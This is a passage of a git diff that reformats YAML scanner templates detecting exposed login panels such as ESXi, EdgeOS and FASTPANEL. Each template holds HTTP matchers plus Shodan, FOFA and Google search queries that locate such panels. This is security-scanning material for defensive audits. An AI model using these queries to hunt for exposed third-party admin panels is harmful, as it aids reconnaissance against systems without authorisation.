b/http/exposed-panels/dynatrace-panel.yaml @@ -8,11 +8,11 @@ info: Dynatrace login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:1828614783 tags: dynatrace,login,panel diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index b3fa2a8071..1d5f8fa7cc 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -10,8 +10,8 @@ info: cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1961736892 fofa-query: title="dzzoffice" tags: dzzoffice,install diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index 376a231d0f..1758220660 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -7,11 +7,11 @@ info: description: DzzOffice login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.favicon.hash:-1961736892 tags: dzzoffice,panel @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index 60e1244529..7c07021cc0 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -5,14 +5,14 @@ info: author: ritikchaddha severity: info description: E-mobile panel was detected. - metadata: - max-request: 3 - verified: true - shodan-query: http.html:"E-Mobile " classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 + metadata: + verified: true + max-request: 3 + shodan-query: http.html:"E-Mobile " tags: panel,e-mobile http: @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/manager/login.do?" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/eMerge-panel.yaml b/http/exposed-panels/eMerge-panel.yaml index a84a0831b2..1a9b2eede1 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -7,11 +7,11 @@ info: description: Nortek Linear eMerge panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"eMerge" tags: panel,emerge,nortek diff --git a/http/exposed-panels/earcu-panel.yaml b/http/exposed-panels/earcu-panel.yaml index 5121126922..38b117d5ac 100644 --- a/http/exposed-panels/earcu-panel.yaml +++ b/http/exposed-panels/earcu-panel.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.earcu.com/products metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: html:'content="eArcu' tags: panel,earcu,detect @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/eclipse-birt-panel.yaml b/http/exposed-panels/eclipse-birt-panel.yaml index bd7fea78ec..c8814e1821 100644 --- a/http/exposed-panels/eclipse-birt-panel.yaml +++ b/http/exposed-panels/eclipse-birt-panel.yaml @@ -5,15 +5,15 @@ info: author: Shiva (Strobes Security) severity: info description: Eclipse BIRT (Business Intelligence Reporting Tool) detected - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://eclipse.github.io/birt-website/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Eclipse BIRT Home" google-query: intitle:"Eclipse BIRT Home" tags: panel,eclipsebirt,detect @@ -27,6 +27,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ecosys-command-center.yaml b/http/exposed-panels/ecosys-command-center.yaml index aacb3ce666..d1ab79d996 100644 --- a/http/exposed-panels/ecosys-command-center.yaml +++ b/http/exposed-panels/ecosys-command-center.yaml @@ -7,11 +7,11 @@ info: description: ECOSYS Command Center RX panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,printer,ecosys,iot metadata: max-request: 1 + tags: panel,printer,ecosys,iot http: - method: GET diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index ab433b1dbb..c2f6c3a5d2 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -7,11 +7,11 @@ info: description: EdgeOS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: login,tech,edgeos,edgemax,panel metadata: max-request: 1 + tags: login,tech,edgeos,edgemax,panel http: - method: GET diff --git a/http/exposed-panels/efak-login-panel.yaml b/http/exposed-panels/efak-login-panel.yaml index a2e23f5568..c246b6a9e6 100644 --- a/http/exposed-panels/efak-login-panel.yaml +++ b/http/exposed-panels/efak-login-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/smartloli/efak - https://www.kafka-eagle.org/ metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:1693580324 - verified: true tags: panel,efak,login,detect http: @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index dea9bd83df..974d5ade0b 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -9,11 +9,11 @@ info: - https://ekoenergetyka.com.pl/software-solutions/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Charger Management Console" google-query: intitle:"Charger Management Console" tags: panel,eko diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index ce9a84d5a5..a19f9096ff 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -9,7 +9,7 @@ info: - https://ekoenergetyka.com.pl/software-solutions/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index 8f3beed7a7..5a20a95b77 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -7,11 +7,11 @@ info: description: Elemiz Network Manager login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Elemiz Network Manager" tags: elemiz,manager,login,panel diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index b4a47a62ab..907160e195 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -11,11 +11,11 @@ info: - https://emby.media/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"emby" tags: panel,emby,oss @@ -26,6 +26,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/emerson-power-panel.yaml b/http/exposed-panels/emerson-power-panel.yaml index c879f44e36..4a9b83ee6a 100644 --- a/http/exposed-panels/emerson-power-panel.yaml +++ b/http/exposed-panels/emerson-power-panel.yaml @@ -7,7 +7,7 @@ info: description: Emerson Network Power IntelliSlot Web Card panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/emessage-panel.yaml b/http/exposed-panels/emessage-panel.yaml index 084474edb6..ca7bc81437 100644 --- a/http/exposed-panels/emessage-panel.yaml +++ b/http/exposed-panels/emessage-panel.yaml @@ -7,7 +7,7 @@ info: description: eMessage login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/ems-login-panel.yaml b/http/exposed-panels/ems-login-panel.yaml index bd08cd2349..08a74d5286 100644 --- a/http/exposed-panels/ems-login-panel.yaml +++ b/http/exposed-panels/ems-login-panel.yaml @@ -7,11 +7,11 @@ info: description: EMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,ems,login metadata: max-request: 1 + tags: panel,ems,login http: - method: GET @@ -26,4 +26,4 @@ http: - type: word words: - - "EMS Web Client - Login" \ No newline at end of file + - "EMS Web Client - Login" diff --git a/http/exposed-panels/ems-webclient-panel.yaml b/http/exposed-panels/ems-webclient-panel.yaml index dde5258e38..eb118cd1ce 100644 --- a/http/exposed-panels/ems-webclient-panel.yaml +++ b/http/exposed-panels/ems-webclient-panel.yaml @@ -7,7 +7,7 @@ info: description: EMS Web Client login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/Login.aspx" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/entrust-identityguard.yaml b/http/exposed-panels/entrust-identityguard.yaml index 82ce4e04b4..540a04b7d7 100644 --- a/http/exposed-panels/entrust-identityguard.yaml +++ b/http/exposed-panels/entrust-identityguard.yaml @@ -7,11 +7,11 @@ info: description: Entrust IdentityGuard Self-Service login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,identityguard metadata: max-request: 1 + tags: panel,identityguard http: - method: GET diff --git a/http/exposed-panels/eos-http-browser.yaml b/http/exposed-panels/eos-http-browser.yaml index ab4aa93475..5e47f8652a 100644 --- a/http/exposed-panels/eos-http-browser.yaml +++ b/http/exposed-panels/eos-http-browser.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=634930085344181&set=pcb.634929508677572 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"EOS HTTP Browser" tags: exposure,eos,httpbrowser,panel @@ -27,4 +27,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/episerver-panel.yaml b/http/exposed-panels/episerver-panel.yaml index bfb7c47f1a..6919a35fa4 100644 --- a/http/exposed-panels/episerver-panel.yaml +++ b/http/exposed-panels/episerver-panel.yaml @@ -9,11 +9,11 @@ info: - https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"epihash" tags: panel,optimizely,episerver diff --git a/http/exposed-panels/epson-access-detect.yaml b/http/exposed-panels/epson-access-detect.yaml index 1875d52d01..9b256f3ddb 100644 --- a/http/exposed-panels/epson-access-detect.yaml +++ b/http/exposed-panels/epson-access-detect.yaml @@ -9,11 +9,12 @@ info: - https://www.exploit-db.com/ghdb/6922 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-668 - tags: iot,printer,panel,unauth,epson,edb metadata: max-request: 1 + tags: iot,printer,panel,unauth,epson,edb + http: - method: GET path: diff --git a/http/exposed-panels/epson-projector-detect.yaml b/http/exposed-panels/epson-projector-detect.yaml index 52c7f36eed..dced57bfd5 100644 --- a/http/exposed-panels/epson-projector-detect.yaml +++ b/http/exposed-panels/epson-projector-detect.yaml @@ -7,7 +7,7 @@ info: description: Epson Projector login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/epson-web-control-detect.yaml b/http/exposed-panels/epson-web-control-detect.yaml index 910a2bad8d..10cbc493f5 100644 --- a/http/exposed-panels/epson-web-control-detect.yaml +++ b/http/exposed-panels/epson-web-control-detect.yaml @@ -9,9 +9,9 @@ info: - https://www.exploit-db.com/ghdb/6873 classification: cwe-id: CWE-200 - tags: panel,unauth,epson,edb,iot,printer metadata: max-request: 1 + tags: panel,unauth,epson,edb,iot,printer http: - method: GET diff --git a/http/exposed-panels/esphome-panel.yaml b/http/exposed-panels/esphome-panel.yaml index 8e6c69eaf4..72e9e79849 100644 --- a/http/exposed-panels/esphome-panel.yaml +++ b/http/exposed-panels/esphome-panel.yaml @@ -7,11 +7,11 @@ info: description: ESPHome login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Login - ESPHome" tags: panel,esphome,iot diff --git a/http/exposed-panels/esxi-system.yaml b/http/exposed-panels/esxi-system.yaml index d7cb9fe3e1..7c417f94c2 100644 --- a/http/exposed-panels/esxi-system.yaml +++ b/http/exposed-panels/esxi-system.yaml @@ -7,7 +7,7 @@ info: description: ESXi System login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,6 +24,7 @@ http: - type: word words: - 'ng-app="esxUiApp"' + - type: status status: - 200 diff --git a/http/exposed-panels/eventum-panel.yaml b/http/exposed-panels/eventum-panel.yaml index 8f2e4d8452..f5f3df3b76 100644 --- a/http/exposed-panels/eventum-panel.yaml +++ b/http/exposed-panels/eventum-panel.yaml @@ -7,11 +7,11 @@ info: description: Eventum login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:305412257 tags: panel,eventum @@ -22,9 +22,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - - type: word part: body words: diff --git a/http/exposed-panels/evlink/evlink-panel.yaml b/http/exposed-panels/evlink/evlink-panel.yaml index 8daa6120aa..ecfdac376b 100644 --- a/http/exposed-panels/evlink/evlink-panel.yaml +++ b/http/exposed-panels/evlink/evlink-panel.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"EVlink Local Controller" fofa-query: title="EVlink Local Controller" tags: panel,evlink,login,detect diff --git a/http/exposed-panels/evlink/evse-web-panel.yaml b/http/exposed-panels/evlink/evse-web-panel.yaml index cc778c2f2a..c8cf5006fc 100644 --- a/http/exposed-panels/evlink/evse-web-panel.yaml +++ b/http/exposed-panels/evlink/evse-web-panel.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"EVSE Web Interface" fofa-query: title="EVSE Web Interface" tags: panel,evlink,evse,login,detect @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/cgi-bin/cgiServer?worker=LoginForm" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ewm-manager-panel.yaml b/http/exposed-panels/ewm-manager-panel.yaml index ee7283bca6..cd89911e51 100644 --- a/http/exposed-panels/ewm-manager-panel.yaml +++ b/http/exposed-panels/ewm-manager-panel.yaml @@ -7,11 +7,11 @@ info: description: EWM Manager login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"EWM Manager" tags: ewm,manager,login,panel diff --git a/http/exposed-panels/exagrid-manager-panel.yaml b/http/exposed-panels/exagrid-manager-panel.yaml index 10bed9c3bb..319731601a 100644 --- a/http/exposed-panels/exagrid-manager-panel.yaml +++ b/http/exposed-panels/exagrid-manager-panel.yaml @@ -7,11 +7,11 @@ info: description: ExaGrid Manager login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ExaGrid Manager" tags: exagrid,manager,login,panel @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/exolis-engage-panel.yaml b/http/exposed-panels/exolis-engage-panel.yaml index f4e56b3722..956169d332 100644 --- a/http/exposed-panels/exolis-engage-panel.yaml +++ b/http/exposed-panels/exolis-engage-panel.yaml @@ -3,17 +3,17 @@ id: exolis-engage-panel info: name: Exolis Engage Panel - Detect author: righettod - description: Exolis Engage panel was detected. severity: info + description: Exolis Engage panel was detected. reference: - https://www.exolis.fr/en/solution-2/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"engage - Portail soignant" google-query: intitle:"engage - Portail soignant" tags: panel,exolis,engage diff --git a/http/exposed-panels/exposed-webalizer.yaml b/http/exposed-panels/exposed-webalizer.yaml index ab51ff1b7d..bdf1df4419 100644 --- a/http/exposed-panels/exposed-webalizer.yaml +++ b/http/exposed-panels/exposed-webalizer.yaml @@ -5,15 +5,15 @@ info: author: pdteam severity: info description: Webalizer panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/197 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intext:"webalizer" intext:"Usage Statistics for" tags: panel,webalizer,edb diff --git a/http/exposed-panels/extreme-netconfig-ui.yaml b/http/exposed-panels/extreme-netconfig-ui.yaml index c97aa2bedf..9e5f49606a 100644 --- a/http/exposed-panels/extreme-netconfig-ui.yaml +++ b/http/exposed-panels/extreme-netconfig-ui.yaml @@ -7,7 +7,7 @@ info: description: Extreme NetConfig UI panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/extron-cms-panel.yaml b/http/exposed-panels/extron-cms-panel.yaml index f55f7410a3..f7e2b38aba 100644 --- a/http/exposed-panels/extron-cms-panel.yaml +++ b/http/exposed-panels/extron-cms-panel.yaml @@ -7,11 +7,11 @@ info: description: Ektron CMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Ektron" fofa-query: app="Ektron-CMS" tags: panel,ektron,cms diff --git a/http/exposed-panels/ez-publish-panel.yaml b/http/exposed-panels/ez-publish-panel.yaml index 66db9c9dc0..56bb4ff1f0 100644 --- a/http/exposed-panels/ez-publish-panel.yaml +++ b/http/exposed-panels/ez-publish-panel.yaml @@ -7,11 +7,11 @@ info: description: eZ Publish login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"eZ Publish" tags: panel,ez @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/f-secure-policy-manager.yaml b/http/exposed-panels/f-secure-policy-manager.yaml index 70574f71c8..9ad9e63ef3 100644 --- a/http/exposed-panels/f-secure-policy-manager.yaml +++ b/http/exposed-panels/f-secure-policy-manager.yaml @@ -7,7 +7,7 @@ info: description: F-Secure Policy Manager Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/faraday-login.yaml b/http/exposed-panels/faraday-login.yaml index a34a371e21..3bd7c98cae 100644 --- a/http/exposed-panels/faraday-login.yaml +++ b/http/exposed-panels/faraday-login.yaml @@ -7,7 +7,7 @@ info: description: Faraday login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/fastapi-docs.yaml b/http/exposed-panels/fastapi-docs.yaml index 820750425f..97a877c9eb 100644 --- a/http/exposed-panels/fastapi-docs.yaml +++ b/http/exposed-panels/fastapi-docs.yaml @@ -7,11 +7,11 @@ info: description: FastAPI Docs panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: fastapi,tech,panel metadata: max-request: 3 + tags: fastapi,tech,panel http: - method: GET diff --git a/http/exposed-panels/fastpanel-hosting-control-panel.yaml b/http/exposed-panels/fastpanel-hosting-control-panel.yaml index 63d4bac80d..b4f06ebdb3 100644 --- a/http/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/http/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -7,11 +7,11 @@ info: description: FASTPANEL login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"FASTPANEL HOSTING CONTROL" tags: panel,fastpanel diff --git a/http/exposed-panels/fatpipe-ipvpn-panel.yaml b/http/exposed-panels/fatpipe-ipvpn-panel.yaml index 4d95a09029..4152e690d1 100644 --- a/http/exposed-panels/fatpipe-ipvpn-panel.yaml +++ b/http/exposed-panels/fatpipe-ipvpn-panel.yaml @@ -8,11 +8,11 @@ info: - https://www.fatpipeinc.com/products/index.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,ipvpn,fatpipe metadata: max-request: 1 + tags: panel,ipvpn,fatpipe http: - method: GET diff --git a/http/exposed-panels/fatpipe-mpvpn-panel.yaml b/http/exposed-panels/fatpipe-mpvpn-panel.yaml index 7a624b169d..43eab721f6 100644 --- a/http/exposed-panels/fatpipe-mpvpn-panel.yaml +++ b/http/exposed-panels/fatpipe-mpvpn-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.fatpipeinc.com/products/mpvpn/index.php classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/fatpipe-warp-panel.yaml b/http/exposed-panels/fatpipe-warp-panel.yaml index 14939b2eae..6caea5526d 100644 --- a/http/exposed-panels/fatpipe-warp-panel.yaml +++ b/http/exposed-panels/fatpipe-warp-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.fatpipeinc.com/products/warp/index.php classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/filebrowser-login-panel.yaml b/http/exposed-panels/filebrowser-login-panel.yaml index 087d9a5df7..3a43b4e279 100644 --- a/http/exposed-panels/filebrowser-login-panel.yaml +++ b/http/exposed-panels/filebrowser-login-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://filebrowser.org/ metadata: - max-request: 2 verified: true + max-request: 3 shodan-query: http.favicon.hash:1052926265 tags: panel,filebrowser,detect @@ -22,6 +22,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/fiori-launchpad.yaml b/http/exposed-panels/fiori-launchpad.yaml index cdf879f713..564d5ddfb0 100644 --- a/http/exposed-panels/fiori-launchpad.yaml +++ b/http/exposed-panels/fiori-launchpad.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7941 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com tags: sap,fiori,edb,panel diff --git a/http/exposed-panels/fiorilaunchpad-logon.yaml b/http/exposed-panels/fiorilaunchpad-logon.yaml index 45c182271e..03ddf61106 100644 --- a/http/exposed-panels/fiorilaunchpad-logon.yaml +++ b/http/exposed-panels/fiorilaunchpad-logon.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6793 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET @@ -27,6 +27,7 @@ http: - "Logon" - "fioriLogin" condition: and + - type: status status: - 200 diff --git a/http/exposed-panels/fireware-xtm-user-authentication.yaml b/http/exposed-panels/fireware-xtm-user-authentication.yaml index b9116c5dac..0882be34c1 100644 --- a/http/exposed-panels/fireware-xtm-user-authentication.yaml +++ b/http/exposed-panels/fireware-xtm-user-authentication.yaml @@ -7,7 +7,7 @@ info: description: Fireware XTM login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,6 +24,7 @@ http: - type: word words: - 'User Authentication' + - type: status status: - 200 diff --git a/http/exposed-panels/flahscookie-superadmin-panel.yaml b/http/exposed-panels/flahscookie-superadmin-panel.yaml index 358db32457..65f98aabff 100644 --- a/http/exposed-panels/flahscookie-superadmin-panel.yaml +++ b/http/exposed-panels/flahscookie-superadmin-panel.yaml @@ -7,11 +7,11 @@ info: description: Flahscookie Superadmin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Flahscookie Superadmin" tags: panel,flahscookie,superadmin diff --git a/http/exposed-panels/flightpath-panel.yaml b/http/exposed-panels/flightpath-panel.yaml index a1f35c6b2d..35eed2d253 100644 --- 